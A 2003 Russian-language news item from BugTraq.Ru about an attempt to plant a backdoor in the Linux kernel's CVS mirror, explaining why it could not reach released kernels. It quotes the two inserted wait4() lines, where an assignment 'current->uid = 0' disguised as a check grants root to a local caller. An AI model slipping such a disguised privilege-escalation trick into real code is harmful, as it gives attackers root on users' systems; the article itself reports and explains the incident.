BugTraq.Ru
Русский BugTraq
http://www.bugtraq.ru/rsn/archive/2003/11/34.html

Еще один неудавшийся бэкдор в ядре Linux
Ktirf // 23.11.03 23:35
Преамбула: для поддержки разработки ядра Linux используется не CVS, а BitKeeper.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/11/34.html]
Соответственно, львиная доля публикуемых ядер (и все ядра, публикуемые на kernel.org) берутся из BitKeeper. Для тех, кто по разным причинам не хочет или не может пользоваться BitKeeper, группа добровольцев поддерживает CVS-зеркало. Изменения в ядре никогда не вносятся напрямую в CVS, только через BitKeeper.
Собственно новость состоит в том, что 6 ноября уже во второй раз (первый был обнаружен 5 ноября, и о нем уже сообщалось) была предпринята попытка внести "небольшое изменение" в CVS-зеркало ядра. Изменение состояло в добавлении двух строк в системный вызов wait4():
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
  retval = -EINVAL;

Выглядит как проверка входных параметров, но если посмотреть на выражение current->uid = 0, то становится ясно, что локальный процесс, вызывающий wait4() с указанным значением options, получает права суперпользователя - классический бэкдор.
К счастью, в силу сказанного в преамбуле, ни в одно из публикуемых ядер это изменение попасть шансов не имело. BitKeeper же является довольно параноидальной системой - в частности, любое вносимое изменение ядра должно получить подтверждение Линуса или его ближайших помощников. Правда, на данный момент в BitKeeper не встроен механизм ЭЦП, поэтому теоретическая возможность протащить патч, выдав себя за источник, которому Линус или любой утверждающий доверяют, пока остается.

Источник: LWN    
теги: linux  |  предложить новость  |  обсудить  |  все отзывы (1) [5335]
назад «  » вперед

аналогичные материалы
Линуксовый ботнет, распространяющийся с помощью краденых ssh-ключей // 19.06.22 00:37
Очередной юбилей Linux // 25.08.21 14:56
Microsoft начинает тестирование Linux GUI-приложений под Windows // 21.04.21 21:21
Десятилетняя уязвимость в sudo // 27.01.21 12:25
25 лет первому сообщению о Linux // 25.08.16 20:57
MS SQL Server выйдет на Linux // 08.03.16 12:43
Серьезная уязвимость в glibc // 17.02.16 13:56
 
последние новости
Google заблокировала 2 с лишним миллиона приложений в прошлом году // 30.04.24 13:10
Бэкдор в xz/liblzma, предназначенный для атаки ssh-серверов // 30.03.24 17:23
Три миллиона электронных замков готовы открыть свои двери // 22.03.24 20:22
Doom на газонокосилках // 28.02.24 17:19
Умер Никлаус Вирт // 04.01.24 14:05
С наступающим // 31.12.23 23:59
Четверть приложений, использующих Log4j, до сих пор уязвима // 11.12.23 18:29

Комментарии:

Класс! 25.11.03 19:28  
Автор: choor Статус: Elderman
<"чистая" ссылка>
Вот что называется не защищённая информация... Очень даже интересно uid=0 :)
<добавить комментарий>





  Copyright © 2001-2024 Dmitry Leonov Design: Vadim Derkach